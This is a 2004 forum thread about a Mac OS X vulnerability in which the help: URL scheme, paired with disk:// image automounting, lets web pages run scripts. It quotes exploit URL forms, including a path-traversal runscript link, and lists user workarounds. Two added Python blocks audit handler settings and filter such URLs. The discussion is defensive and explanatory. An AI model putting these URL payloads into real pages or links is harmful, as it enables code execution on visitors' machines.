Should the companies turn computing into a completely passive experience like watching TV to 'secure' its users, or should more attention be paid into getting users to become familiar with the equipment they just purchased?

It's hard to make a generalisation. This specific vulnerability is a bug, allowing a remote site to download and run executables on a remote machine is far, far too easy a route to allow. Exploits of this could catch even experienced users.

Educating users is certainly part of the solution. But if users have to spend a significant portion of the day evaluating the risk in every page they visit, every download they make, every email they open, and downloading security patches and virus definitions, then technology has started to be more of a burden than an enabler. More sophisticated exploits will fool even wary users, technology has to improve as well. Technologies such as the NSA's SE Linux might be an indicator of future trends in this regard.

killmoms
May 18, 2004, 11:01 AM
Speaking as a multi-vendor admin I must confess I'm enjoying this exploit; it's nice to see the sneering obnoxious holier-than-thou Mac zealots having their noses rubbed in it for a change :D

What is absolutely HILARIOUS is them all trying to talk it down!

If this were a Microsoft exploit the sky would be falling and those same people would be zealoting (I just made that word up) about how much better the Mac is.

My nose isn't being rubbed in anything. This sort of "vulnerability" is present in any other OS. I could write a script in Windows that starts silently deleting everything on your hard drive in about five minutes and easily convince a computer-illiterate person to click on it. This isn't a virus. It barely fits the description of a trojan. It's not spreadable but by people's ignorance. Apple will close the Help Viewer hole that allows the script to be run and be done with it.

When you work in Linux, it gives you the power to do what you want. I can see where scripting shell commands might be a very useful thing to do. I'm starting to question how useful making scripts auto-executable from the GUI (which have potentially destructive shell commands in them) is, but that's another issue entirely.

--Cless

MongoTheGeek
May 18, 2004, 11:02 AM
The problem is the script OpnApp.scpt doesn't do any checking to see what it is opening.

It is used by the help viewer to open applications and documents (such as preference panes.)

Rower_CPU
May 18, 2004, 11:08 AM
Speaking as a multi-vendor admin I must confess I'm enjoying this exploit; it's nice to see the sneering obnoxious holier-than-thou Mac zealots having their noses rubbed in it for a change :D

What is absolutely HILARIOUS is them all trying to talk it down!

If this were a Microsoft exploit the sky would be falling and those same people would be zealoting (I just made that word up) about how much better the Mac is.

I'm not arguing in the slightest that BSD is inherently more secure than Windows, but there are a lot of drama queens out there.

Speaking as a multi-vendor admin I say anything that has the potential to make my job harder and degrade the productivity of the users I support is a bad thing - regardless of platform.

iostream.h
May 18, 2004, 11:38 AM
We at Isophonic fixed it:

Isophonic (http://isophonic.net)

billyboy
May 18, 2004, 11:55 AM
We at Isophonic fixed it:

Isophonic (http://isophonic.net)

And why might this not be a hoax? I'm kidding you, but just because some of your other software does the job it says it does, can we believe that the link is even to your site? Oh, the paranoia. I just ran Virex for the first time in weeks too.

Oh yes, and a similar thread was deleted by moderators at the apple discussion boards. :confused: Why would that be? There was no conjecture or double guessing about Apple's next greatest invention going on.

pjkelnhofer
May 18, 2004, 12:15 PM
And why might this not be a hoax? I'm kidding you, but just because some of your other software does the job it says it does, can we believe that the link is even to your site? Oh, the paranoia. I just ran Virex for the first time in weeks too.


This brings up a good point. I too want to download the "fixes" for this problem, but I am paranoid about doing it now. Until something comes through my Software Update, I am not really sure what to do. How do we know who we can trust anymore?

iostream.h
May 18, 2004, 12:27 PM
I am not really sure what to do. How do we know who we can trust anymore.

You don't have to download this, but I can guarantee you that it only has good intents behind it :)

oswizrd
May 18, 2004, 12:39 PM
If you are as paranoid as I am instead of downloading and running an application you don't trust you can always edit the Launch Services preferences plist yourself.

In Jaguar (10.2.8) I added the following to my

~/Library/Preferences/com.apple.LaunchServices.plist


<key>U:help</key>
<array>
<dict>
<key>LSBundleIdentifier</key>
<string>com.adobe.acrobat.reader</string>
<key>LSBundleLocator</key>
<data>
AAAAAADqAAMAAAAAt0av6gAASCsAAAAAAAdaJQAHWhkA
ALmsu7AAAAAAASD//kFQUExDQVJP/////wABABAAB1ol
AAdaIwABTTQAAASwAA4AJgASAEEAYwByAG8AYgBhAHQA
IABSAGUAYQBkAGUAcgAgADUALgAwAA8AGgAMAE0AYQBj
AGkAbgB0AG8AcwBoACAASABEABIARUFwcGxpY2F0aW9u
cy9BY3JvYmF0IFJlYWRlciA1LjAuYXBwL0NvbnRlbnRz
L01hY09TL0Fjcm9iYXQgUmVhZGVyIDUuMAAAEwABLwD/
/wAA
</data>
<key>LSBundleRoleMask</key>
<integer>-1</integer>
<key>LSBundleSignature</key>
<string>CARO</string>
<key>LSBundleVersion</key>
<integer>329215</integer>
</dict>
</array>


so now it will run Adobe Acrobat Reader instead of the Help.app
when the help: protocol is invoked

You probably need to log off and log on again in order to rebuild
the
~/Library/Caches/com.apple.LaunchServices.UserCache.csstore


Have fun
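
A read-only check of the override described in the post above, as an added example that is not part of the original post or of any project's code: it parses a LaunchServices preferences plist and reports which bundle identifiers are bound to the `U:help` key. The function names, the sample plists, the assumption that the fragment sits directly in the file's top-level dict, and the Help Viewer identifier `com.apple.helpviewer` are not from the thread.

```python
import plistlib
from xml.parsers.expat import ExpatError

# Assumption: bundle identifier of Apple's Help Viewer (not given in the thread).
HELP_VIEWER_ID = "com.apple.helpviewer"

# Constructed sample: the override from the post, wrapped in a top-level <dict>
# (assumed layout) and without the LSBundleLocator alias data.
SAMPLE_OVERRIDDEN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>U:help</key>
  <array>
    <dict>
      <key>LSBundleIdentifier</key>
      <string>com.adobe.acrobat.reader</string>
      <key>LSBundleRoleMask</key>
      <integer>-1</integer>
      <key>LSBundleSignature</key>
      <string>CARO</string>
    </dict>
  </array>
</dict>
</plist>"""

# Constructed sample: a preferences file with no scheme overrides at all.
SAMPLE_NO_OVERRIDE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict></dict></plist>"""


def scheme_handlers(prefs, scheme):
    """Return the bundle identifiers listed under the U:<scheme> key."""
    entries = prefs.get("U:" + scheme, [])
    if isinstance(entries, dict):      # tolerate a single dict instead of an array
        entries = [entries]
    if not isinstance(entries, list):
        return []
    ids = []
    for entry in entries:
        if isinstance(entry, dict):
            bundle_id = entry.get("LSBundleIdentifier")
            if isinstance(bundle_id, str) and bundle_id:
                ids.append(bundle_id)
    return ids


def audit_scheme(plist_bytes, scheme="help"):
    """Classify the user-level binding for a URL scheme.

    Returns (status, bundle_ids) where status is one of:
      "unreadable"  - the bytes are not a parseable plist dictionary
      "no-override" - no usable U:<scheme> entry, so the system default applies
      "help-viewer" - an entry explicitly points at Help Viewer
      "overridden"  - the scheme is bound to some other application
    """
    try:
        prefs = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ExpatError, ValueError):
        return ("unreadable", [])
    if not isinstance(prefs, dict):
        return ("unreadable", [])
    ids = scheme_handlers(prefs, scheme)
    if not ids:
        return ("no-override", [])
    if any(i.lower() == HELP_VIEWER_ID for i in ids):
        return ("help-viewer", ids)
    return ("overridden", ids)


if __name__ == "__main__":
    for name, blob in (("overridden sample", SAMPLE_OVERRIDDEN),
                       ("untouched sample", SAMPLE_NO_OVERRIDE),
                       ("damaged file", b"not a plist")):
        print(name, audit_scheme(blob, "help"))
```

The check only reads the preferences file; as the post notes, the change takes effect once the LaunchServices user cache has been rebuilt.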

nmk
May 18, 2004, 12:41 PM
I can vouch for the patch. I only downloaded it because it can be found at Macupdate. Since most of you will be paranoid about clicking on any link I post here, go to Macupdate and check it out yourself. The software is called Don't go there GURLfriend and can be found in the "weekly popular" section of Mac OS X. I installed it and then tried running the exploit that was mentioned at the beginning of this thread. The help viewer app opened, but nothing else happened. No messages of my system being compromised were displayed (as the script is meant to do).

Skiniftz
May 18, 2004, 12:41 PM
Speaking as a multi-vendor admin I say anything that has the potential to make my job harder and degrade the productivity of the users I support is a bad thing - regardless of platform.
On a professional level, I agree with you wholeheartedly.

On a personal level it's nice to be able to demonstrate to the blind zealots who INSIST that the Mac is invulnerable, that yes, it can, and does, have its flaws, and those can be exploited just like any other system.

MongoTheGeek
May 18, 2004, 12:48 PM
I have a "better" fix than the one isotonic did.

http://users.adelphia.net/~lively/fixbug.dmg

inside of it is an applescript which installs it in all needed files in the help folder (i didn't find any outside of it)

it for the most part preserves the functionality of the help viewer (It can open files but only with your say so and not from ejectable devices.)

The script is readable, and the installer is readable.

Skiniftz
May 18, 2004, 12:56 PM
<snip>
I could write a script in Windows that starts silently deleting everything on your hard drive in about five minutes and easily convince a computer-illiterate person to click on it. <snip>
Really? A shell script that could be executed silently by a user simply clicking a weblink? On a Windows system that is patched? I don't think so.

No, this Help exploit isn't a virus, however it would make a very good launch mechanism for one.

For example, what if someone were to write a script to plunder a user's address book and send email to all of the people in it, the email naturally containing the script or perhaps simply a web link? (Can't hurt to click a link can it? I mean I have a Mac which means I can't get viruses right?).

Time and again it's proven that users on the whole really are too trusting, especially when they get an email from a friend. This is precisely how NetSky et al spread. Nothing happens automatically, the user is emailed an encrypted ZIP file that contains the virus. (It's encrypted to defeat attachment scanning programs). The user is sent the password to extract the virus, and told that if they click it they will see a naked picture or some other such lie. This has recently been proven to be one of the most successful virus spreading techniques ever. Later versions are getting more sophisticated and are starting to combine techniques to spread more effectively.

Don't buy into the myth that OSX is 100% secure. ALL modern OS's have their problems and require patching if they are going to be exposed to potentially hostile networks and code. If (when?) the Mac ha{d/s} the market share that Windows does, there are one hell of a lot of attackers out there who will attempt to exploit anything they can.

Skiniftz
May 18, 2004, 12:59 PM
I have a "better" fix than the one isotonic did.

http://users.adelphia.net/~lively/fixbug.dmg

inside of it is an applescript which installs it in all needed files in the help folder (i didn't find any outside of it)
<snip>


... considering you are using a DMG to distribute it, you should have written it to use the exploit to install automatically - it would have been poetically ironic. :D

AmigoMac
May 18, 2004, 01:13 PM
Really? A shell script that could be executed silently by a user simply clicking a weblink? On a Windows system that is patched? I don't think so.

No, this Help exploit isn't a virus, however it would make a very good launch mechanism for one.

For example, what if someone were to write a script to plunder a user's address book and send email to all of the people in it, the email naturally containing the script or perhaps simply a web link? (Can't hurt to click a link can it? I mean I have a Mac which means I can't get viruses right?).

Time and again it's proven that users on the whole really are too trusting, especially when they get an email from a friend. This is precisely how NetSky et al spread. Nothing happens automatically, the user is emailed an encrypted ZIP file that contains the virus. (It's encrypted to defeat attachment scanning programs). The user is sent the password to extract the virus, and told that if they click it they will see a naked picture or some other such lie. This has recently been proven to be one of the most successful virus spreading techniques ever. Later versions are getting more sophisticated and are starting to combine techniques to spread more effectively.

Don't buy into the myth that OSX is 100% secure. ALL modern OS's have their problems and require patching if they are going to be exposed to potentially hostile networks and code. If (when?) the Mac ha{d/s} the market share that Windows does, there are one hell of a lot of attackers out there who will attempt to exploit anything they can.


If a Virus/Trojan has to be spread through Mail, using the Address Book It wouldn't hit a big population of Mac Users, just for me would be unusable, from my address book I only have one "Mac Friend" the rest are Windows'ers and an applescript file would have no sense, worst a *.dmg file, I think that this whole thread of Mac Trojan/Virus comes from any Antivirus/Firewall Company or maybe from some Pro-MS-Place to create a bad atmosphere before WWDC, nevertheless, it's really necessary to address this kind of issues within our OS, it has never been a Virus/Trojan, it doesn't come to us, we have to go to it before it can operate, double-clicking or opening a homepage, but spread through an E-mail app would give less than 5% the infection efficiency expected from the writer...

MongoTheGeek
May 18, 2004, 01:23 PM
... considering you are using a DMG to distribute it, you should have written it to use the exploit to install automatically - it would have been poetically ironic. :D

God help me, I almost did. :)

greg75
May 18, 2004, 01:49 PM
Lots of clueless apologists here.

THIS EXPLOIT DOES NOT REQUIRE USERS TO DOWNLOAD AND START SOMETHING MANUALLY.

The exploit is triggered automatically just by visiting a web page (http://www.free-go.net/insecure/safari/0x04_test.html). Do you check links before you click them? (http://tinyurl.com/298vb)

Question for the apologists here: Do you download every web page and analyze it before you open the page with a web browser?

PS: The exploit was reported to Apple TWO MONTHS AGO.

AmigoMac
May 18, 2004, 01:56 PM
PS: The exploit was reported to Apple TWO MONTHS AGO.

Have you a confirmed source of this? I would like to know why they haven't patched this if it's true... Hard to get it... :( .. bad for mac-users if they knew about this... I'd like to doubt it...

IJ Reilly
May 18, 2004, 03:26 PM
On a professional level, I agree with you wholeheartedly.

On a personal level it's nice to be able to demonstrate to the blind zealots who INSIST that the Mac is invulnerable, that yes, it can, and does, have its flaws, and those can be exploited just like any other system.

I'd classify this as a "cheap thrill." Maybe I'm just jealous because my thrills tend to be very expensive.

IJ Reilly
May 18, 2004, 03:35 PM
For the good of the order, somebody with an appropriate level of knowledge should sort through the various competing claims for disabling this vulnerability made in this thread and elsewhere. Until we've got a proper if not more permanent fix from Apple, we need to know what works and what doesn't. Myself, I took the advice of renaming Library/Documentation/Help to something else, because it was the simplest and fastest solution, and didn't require a download, but at this point I don't know what to recommend to other Mac users (and as the informal Mac support guy for miles around, I know I'm going to be asked).

guerro
May 18, 2004, 03:48 PM
Is it really a vulnerability if the OS is just doing what it was designed and intended to do??? No. This is merely someone exploiting the way the operating system works. The real vulnerability with this is STUPID USERS. :rolleyes:

IJ Reilly
May 18, 2004, 04:07 PM
Is it really a vulnerability if the OS is just doing what it was designed and intended to do??? No. This is merely someone exploiting the way the operating system works. The real vulnerability with this is STUPID USERS. :rolleyes:

You know, I get seriously torked off when the "blame the victim" explanations are trotted out by the Windows benie-brains every time a gaping OS hole appears on that platform, and I like it even less when it happens on the Mac.

Let's be serious here: Apple goofed. Apple needs to fix the goof.

cryhavoc2112
May 18, 2004, 04:25 PM
You know, I get seriously torked off when the "blame the victim" explanations are trotted out by the Windows benie-brains every time a gaping OS hole appears on that platform, and I like it even less when it happens on the Mac.

Let's be serious here: Apple goofed. Apple needs to fix the goof.


I disagree. If you aren't aware of proper surfing practices, don't surf.
There are holes everywhere...it is up to the user to be aware, through newsgroups, listservs, websites, magazines etc. Yes, Apple needs to fix the hole, but surfers need to be informed. It's a big net out there, and only the educated will survive. Oh, and my benie-brain sees gaping wounds in your bloated OSX that Apple ignores. Just remember, all OS's SUCK! :cool:

tkn0spdr
May 18, 2004, 04:31 PM
Lots of clueless apologists here.

THIS EXPLOIT DOES NOT REQUIRE USERS TO DOWNLOAD AND START SOMETHING MANUALLY.

The exploit is triggered automatically just by visiting a web page (http://www.free-go.net/insecure/safari/0x04_test.html). Do you check links before you click them? (http://tinyurl.com/298vb)

Question for the apologists here: Do you download every web page and analyze it before you open the page with a web browser?

PS: The exploit was reported to Apple TWO MONTHS AGO.

Personally, I read the relevant information, analyze it, and make an informed decision on what to do. I downloaded the fix with the funny name and nifty icon and patched my system. Now when I click on your link my help viewer opens and that's that. At this point I know that the link is bad and can safely ignore future requests to click on it...
Even if my friends (allegedly) send me an e-mail telling me I should.

"No, really... it WAS an exploit but now it's Barbara Bush nekkid, you'll love it, go ahead and click."

jessefoxperry
May 18, 2004, 05:17 PM
You can also use this to do the same thing as MisFox. It just does the Helper protocols.

http://www.monkeyfood.com/software/MoreInternet/

It's in the form of a preference pane, which I find more convenient.

i like this a lot better. thx for the heads up.

jessefoxperry
May 18, 2004, 05:22 PM
Useless as it doesn't stop disk:// links being automounted.

correct me if i'm wrong but it doesn't matter what opens "disk://" because in the end, when it tries to get the "help:" helper it'll stop it in its tracks - because the vulnerability is w/ what opens 'help:' not 'disk:'

Spades
May 18, 2004, 05:28 PM
Is it really a vulnerability if the OS is just doing what it was designed and intended to do??? No. This is merely someone exploiting the way the operating system works. The real vulnerability with this is STUPID USERS. :rolleyes:

Nope. It's still a flaw. There's a flaw in the design. In any case, exploitation of this only requires visiting a website. It's difficult to verify the trustworthiness of a website without visiting it, so there's no need to be stupid to be affected by this. There's plenty of cases where the problem is the user not using common sense, but this is not one of them.

Automatic Remote Application Execution = Flaw.

IJ Reilly
May 18, 2004, 06:08 PM
I disagree. If you aren't aware of proper surfing practices, don't surf.

And you've actually been reading this thread, have you? The only "proper surfing" you could practice would be to not surf at all. I'm beginning to think that some people would think it was fine if all a PC was capable of doing safely was burning up electricity and expelling warm air. "Hey, it works great, so long as you don't turn it on!"

D*I*S_Frontman
May 18, 2004, 06:43 PM
So when will Apple be putting the fix into Software Update? Should we start a pool? Within one week? Two? Three? A month?

Skiniftz
May 18, 2004, 07:06 PM
correct me if i'm wrong but it doesn't matter what opens "disk://" because in the end, when it tries to get the "help:" helper it'll stop it in its tracks - because the vulnerability is w/ what opens 'help:' not 'disk:'

You are correct in that help:// is needed to be accessed, however turning off "safe" attachments will not stop help opening, as it's not an attachment.

The dangerous part is the disk:// image automount, as it will contain the payload, as right now arguments cannot be passed to shell commands launched via the built in AppleScript exploit.

The disk:// launching is the "dangerous" part - if it didn't do that then it would not be so bad.

Skiniftz
May 18, 2004, 07:11 PM
If a Virus/Trojan has to be spread through Mail, using the Address Book It wouldn't hit a big population of Mac Users, just for me would be unusable, from my address book I only have one "Mac Friend" the rest are Windows'ers and an applescript file would have no sense, worst a *.dmg file, I think that this whole thread of Mac Trojan/Virus comes from any Antivirus/Firewall Company or maybe from some Pro-MS-Place to create a bad atmosphere before WWDC, nevertheless, it's really necessary to address this kind of issues within our OS, it has never been a Virus/Trojan, it doesn't come to us, we have to go to it before it can operate, double-clicking or opening a homepage, but spread through an E-mail app would give less than 5% the infection efficiency expected from the writer...
I agree that the amount of Mac users out there is most definitely a factor, which works in our favour at the moment as haxx0rs don't really have much to gain - it would probably fizzle out.

Now imagine if the latest version of NetSky turns up with this Mac exploit included along with a PC exploit in the same email. Not exactly difficult.

Instant multi platform virus. :(

Sailfish
May 18, 2004, 09:25 PM
LS didn't alert me of anything when I used Address Book. Maybe you were using a feature that needed to make a connection somewhere. :confused:

Ok Addressbook connects to

homepage.mac.com on port 80

when you launch it. Still it's a bit scary and definitely unwelcome to some folks.

Sailfish
May 18, 2004, 09:26 PM
So when will Apple be putting the fix into Software Update? Should we start a pool? Within one week? Two? Three? A month?


I uh told Apple about it several months ago when it first appeared on slashdot.

Thought they fixed it long ago.

garybUK
May 19, 2004, 02:32 AM
All apple need to do is change safari slightly so that when a disk image is downloaded a message box asks if the user wants to mount it or not. a simple yes/no with a warning that if you don't know what it is then don't open it.

Awimoway
May 19, 2004, 03:21 AM
You are correct in that help:// is needed to be accessed, however turning off "safe" attachments will not stop help opening, as it's not an attachment.

The dangerous part is the disk:// image automount, as it will contain the payload, as right now arguments cannot be passed to shell commands launched via the built in AppleScript exploit.

The disk:// launching is the "dangerous" part - if it didn't do that then it would not be so bad.

Okay, so for the idiots out there (like me, I confess), I need to change the helper app for not just the "help" protocol but also the "disk" protocol to something like Chess? I used the More Internet pref pane and changed the help protocol, but I didn't have a disk protocol listed, so I added one merely titled "disk" (I would have tried disk:// format but More Internet wouldn't allow colons). Is this correct?

Now the safe example opens Chess, but of course it's only testing the help protocol, if I understand correctly. Can someone make a safe example of the exploit that uses the disk protocol so I can test it too?

After G
May 19, 2004, 04:18 AM
FWIW, this is how this thing works:

A user is directed to a page that does two things: (1) Downloads a disk image to the user's computer which will hopefully be automounted, and (2) redirects the page to the URL "help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt" with the argument "string='Volumes:0x04_script:0x04_script.term'"

What this does is instruct the Help Viewer application to send the «event helphdhp» AppleEvent to a script file located at a path relative to /Library/Documentation/Help/. If the script file does not respond to this Apple Event, nothing will happen. You cannot use this method to directly execute non-compiled applescript, binary executables, or applescript which is inline with the URL. You have to find a script which responds to «event helphdhp». I imagine that there are not a whole lot of these scripts save for the two bundled with the Help Viewer application itself: OpnApp.scpt and opnbndsig.scpt.

I tried renaming the scripts to see if that would do anything, and the exploit seems to be prevented (both the webpage link and the .dmg versions). My question, though, is what do OpnApp.scpt and opnbndsig.scpt do that would be important to Help Viewer, such that I would not want to rename them, and I should instead try one of the other solutions, such as changing permissions?

MongoTheGeek
May 19, 2004, 06:55 AM
I tried renaming the scripts to see if that would do anything, and the exploit seems to be prevented (both the webpage link and the .dmg versions). My question, though, is what do OpnApp.scpt and opnbndsig.scpt do that would be important to Help Viewer, such that I would not want to rename them, and I should instead try one of the other solutions, such as changing permissions?

They are used by help to open files as part of the help. For instance the take me to the blah blah preference or the go to blah blah website.

http://users.adelphia.net/~lively/fixbug.dmg has a script that replaces the current versions (it's in more than one help file) with one that

1) won't launch an application (there is another script for that so that shouldn't be an issue)
2) won't open something off of a mounted volume, probably a good safety measure.
3) asks before anything is opened.

It's not ready for localized versions of the help files.

Hugin777
May 19, 2004, 08:56 AM
Changing OpnApp.scpt won't help !

The fixes from MongoTheGeek and Isophonic (iostream.h) are NOT ENOUGH !

Try http://bronosky.com/pub/AppleScript.htm - this isn't a complete exploit, but coupled with the disk: protocol it is. (Edit: to be more precise: Try this link "help:runscript=../../Scripts/Info%20Scripts/Current%20Date%20&%20Time.scpt")


The ONLY good fix is to map the "help:" protocol to start something other than HelpViewer. - Note that this apparently won't affect the help system in any way ! (do this with Internet Explorer -> Settings -> Network -> Protocol Helpers)

It would be really easy for Apple to issue a quick fix that just changed the "help:" protocol (or somehow removed it). I guess they aren't in any hurry since no one has exploited this in a bad way...yet.

MongoTheGeek
May 19, 2004, 09:51 AM
The ONLY good fix is to map the "help:" protocol to start something other than HelpViewer. - Note that this apparently won't affect the help system in any way ! (do this with Internet Explorer -> Settings -> Network -> Protocol Helpers)

It will break some ways of getting to the help system.

Hugin777
May 19, 2004, 09:57 AM
It will break some ways of getting to the help system.

Ok, I haven't noticed. Could you please be more specific ?

Well, starting help from a website comes to mind, but who does that anyway ? :)

tkn0spdr
May 19, 2004, 10:03 AM
Changing OpnApp.scpt won't help !

(Edit: to be more precise: try this link (help:runscript=../../Scripts/Info%20Scripts/Current%20Date%20&%20Time.scpt))
Maybe I'm doing something wrong. When I click that link absolutely nothing happens, guess I'm safe eh?

Hugin777
May 19, 2004, 10:09 AM
Maybe I'm doing something wrong. When I click that link absolutely nothing happens, guess I'm safe eh?

Sorry, remove the "http://" :-/

dvapplepro
May 19, 2004, 10:48 AM
Every day someone tries to find some way to say something bad about the Mac OS. The last update has fixed this problem and I don't think that there should be anything to worry about, such as worms and viruses. I don't think you have anything to worry about. Microsoft put out XP and a minute later there come those security updates. I just have to say I'm happy that I don't have to deal with another computer that has to use Windows updates. All I have to say is the next best thing to the Mac OS is open source.


Bobby The Gibbons
crazybobby.com

tkn0spdr
May 19, 2004, 10:48 AM
When I try it that way, Help Viewer launches and that's it. The script itself doesn't run. Seems DGTGF does its job well.

pjkelnhofer
May 19, 2004, 11:54 AM
All Apple need to do is change Safari slightly so that when a disk image is downloaded a message box asks if the user wants to mount it or not. A simple yes/no with a warning that if you don't know what it is then don't open it.

Or along with the auto-open safe attachments preference. There could be an auto-mount disk images feature (which when turned off Safari or the Finder would prompt you if you really want to mount the image).

Philosopher
May 19, 2004, 01:58 PM
Unfortunately (downloading and executing a script from a .dmg file is bad enough) this vulnerability doesn't need to download a .dmg file first to gain access...

Check this out: http://bronosky.com/pub/AppleScript.htm

Hugin777
May 19, 2004, 03:58 PM
When I try it that way, Help Viewer launches and that's it. The script itself doesn't run. Seems DGTGF does its job well.

Ok, I give up.

Here is a real example (http://ozwix.dk/OpnAppFixer/testit.html) - although in steps so you can see what happens. Of course totally harmless, and nothing will happen before you click a link from the linked page.

The disk image actually was stolen from lixlpixel - the person who discovered this security hole initially.

Hugin777
May 19, 2004, 06:02 PM
It seems Windows had the same problem - but Microsoft got it fixed before Apple !

http://www.cnn.com/2004/TECH/internet/05/12/microsoft.flaw.warning.reut/index.html

:)

tkn0spdr
May 19, 2004, 07:50 PM
Ok, I give up.

Here is a real example (http://ozwix.dk/OpnAppFixer/testit.html) - although in steps so you can see what happens. Of course totally harmless, and nothing will happen before you click a link from the linked page.

The disk image actually was stolen from lixlpixel - the person who discovered this security hole initially.

Alright, those still worked. Hey, I wasn't trying to argue with you I just wanted to test the limits of the 'fix' that I had applied. Seems it wasn't good enough. I changed the help URI and now it seems I'm safe even from those.
Thanks.

Hugin777
May 20, 2004, 03:14 AM
Alright, those still worked. Hey, I wasn't trying to argue with you [..]

I'm sorry. I'm just frustrated on isophonic.net because I have written them twice, and they still make people believe that they are secured by their fix when they are not... :mad:

kallisti
May 20, 2004, 08:56 AM
Unsanity released a free fix (Paranoid Android) for this vulnerability as well as another which has been reported to Apple but is not yet public.

From their website (http://www.unsanity.com/haxies/pa/):

"Paranoid Android can protect you from this potential vulnerability until Apple makes an official fix available. It does this by watching the URL schemes that are requested and delaying them until you've had a chance to say whether you'd like to proceed or not. If you know that the url that's being loaded is legit, go ahead, but if it looks suspicious, Paranoid Android gives you an opportunity to cancel it."

Includes an uninstaller with the installer.
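
The scheme-watching idea in the Paranoid Android description, combined with the help:runscript path behaviour explained earlier in the thread, can be expressed as a small URL gate. This is an added example, not code from Unsanity, Apple or any poster; the function names, the verdict labels, the space separating the script path from its argument, and the example.invalid URLs are assumptions.

```python
"""URL-scheme gate for the help:/disk: issue discussed in this thread.

Added example, not code from Paranoid Android or Apple. Sample URLs are
constructed, except the two help:runscript forms quoted in the thread.
"""
import posixpath
import re
from urllib.parse import unquote

# Base directory the thread says runscript paths are resolved against.
HELP_ROOT = "/Library/Documentation/Help"
# Schemes the thread recommends remapping or disabling.
WATCHED = {"help", "disk"}

# Assumption: the script path ends at a ".scpt" that is followed by
# whitespace or the end of the URL; anything after it is the argument.
RUNSCRIPT_RE = re.compile(
    r"runscript=(.*?\.scpt)(?=\s|$)(.*)", re.IGNORECASE | re.DOTALL
)


def classify(url):
    """Return (verdict, reason); verdict is 'allow', 'prompt' or 'block'."""
    scheme, sep, rest = url.strip().partition(":")
    scheme = scheme.lower()
    if not sep or scheme not in WATCHED:
        return "allow", "scheme not watched"
    if scheme == "disk":
        return "prompt", "would fetch and mount a disk image"

    rest = unquote(rest)  # decode %20, %2e%2e%2f and similar before checking
    match = RUNSCRIPT_RE.match(rest)
    if not match:
        return "prompt", "help: URL requested by web content"

    script, argument = match.group(1), match.group(2).strip()
    # Resolve the way a relative path under the help root would resolve,
    # so "../" sequences and absolute paths become visible.
    resolved = posixpath.normpath(posixpath.join(HELP_ROOT, script))
    if not resolved.startswith(HELP_ROOT + "/"):
        return "block", "runscript path escapes help root: " + resolved
    if re.search(r"\bvolumes[:/]", argument, re.IGNORECASE):
        return "block", "runscript argument targets a mounted volume"
    return "prompt", "runscript inside help root: " + resolved


def gate(urls):
    """Classify each requested URL; returns (url, verdict, reason) tuples."""
    return [(u,) + classify(u) for u in urls]


OPNAPP = "help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt"

SAMPLE_REQUESTS = [
    "http://example.invalid/index.html",                 # constructed
    "disk://example.invalid/constructed.dmg",            # constructed
    OPNAPP,                                              # path from the thread
    # Path and argument from the thread, joined with a space (assumption):
    OPNAPP + " string='Volumes:0x04_script:0x04_script.term'",
    # Traversal form quoted in the thread:
    "help:runscript=../../Scripts/Info%20Scripts/Current%20Date%20&%20Time.scpt",
    "HELP:RunScript=%2e%2e%2f%2e%2e%2fconstructed.scpt",  # constructed
]

if __name__ == "__main__":
    for url, verdict, reason in gate(SAMPLE_REQUESTS):
        print(f"{verdict:6} {reason}\n       {url}")
```

The two checks correspond to the two halves discussed in the thread: a script path that leaves the help directory, and a bundled script being pointed at a mounted volume.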

Mitthrawnuruodo
May 20, 2004, 08:59 AM
Came across a fix on this site (http://www.macintouch.com/newsrecent.shtml#i.2004.05.18.secunia) that seems quite good.


Other readers offered workarounds for the problem:
...
[Tracy Valleau] Here's a quick, and harmless (read; reversible) fix for the help autolaunch vulnerability:

First, make a Backup copy of /Library/Documentation/Help/MacHelp.help.
Next do a show contents on the original, and
find: Contents/Resources/English.lproj/shrd/OpnApp.scpt
Make the change as shown below (adding the two dashes in front of "open file completeParam of the startup disk"). (This comments out that line of code, so it won't run.)


on «event helphdhp» (completeParam)
    -- localizable text
    set cancelBtn to "Cancel"
    set errorText to "The item cannot be opened. It may be disabled or not installed."
    --end localizable text
    try
        tell application "Finder"
            -- open file completeParam of the startup disk
        end tell
    on error errMsg number errNum
        display dialog errorText buttons {cancelBtn} default button 1 with icon 0
        return
    end try
end «event helphdhp»


Save the file.
Remove all your foreign language versions of the same help file (at the Resources level)
After doing this, the help file will still run, but will not be able to "open xyz for me"
* Later on, you can replace your patched copy with the backup copy of MacHelp.help you made in step one, and apply Apple's (forthcoming) fix to it. Meanwhile, you'll be safe from that exploit.


It was quite handy, as I deleted all the other languages that help has available, thus reducing the file to about 1/8 of the original size... :)

Hugin777
May 20, 2004, 04:17 PM
Came across a fix on this site (http://www.macintouch.com/newsrecent.shtml#i.2004.05.18.secunia) that seems quite good.

It's not enough. Try this link (http://ozwix.dk/OpnAppFixer/testit.html) to test how secure you is(n't)...

Mitthrawnuruodo
May 20, 2004, 04:51 PM
It's not enough. Try this link (http://ozwix.dk/OpnAppFixer/testit.html) to test how secure you is(n't)...

Hmm... not good...

Edit: Well I'm protected now, but at the cost that Help Viewer can no longer execute...

As root in terminal (su):
root# chmod 400 /System/Library/CoreServices/Help\ Viewer.app
This command makes Help Viewer read-only (cannot be changed or executed).

Edit2: Ok, I give up... Paranoid Android installed... :rolleyes:

billyboy
May 20, 2004, 05:44 PM
The mis-fox solution works ok for this particular script, but am I right in thinking that help is not the only app that can be told to run a script?

Hugin777
May 21, 2004, 04:09 AM
Edit: post deleted. Only fix now is to install the Paranoid Android or disable auto-open _and_ disable "disk:"...

biscuit
May 21, 2004, 08:48 AM
Right, well I haven't read the thread or done a search but I'm a little bit tired of reading about this. Instead I shall point you all to a MacNN Forums post (http://forums.macnn.com/showthread.php?s=&threadid=213043&perpage=50&pagenumber=6#post1995710) covering the full extent of this security hole and tell you that Paranoid Android is currently the only way to be completely safe.

Someone mentioned earlier that the flaw isn't public, well I think being posted on a BB is pretty public. I think we should be telling as many people as possible rather than trying to keep a lid on it, that way Apple might get a fix out. Oh yeah, and e-mailing Apple repeatedly is probably a good idea.

Sorry if my tone is a little short....

biscuit

Bernd
May 21, 2004, 12:11 PM
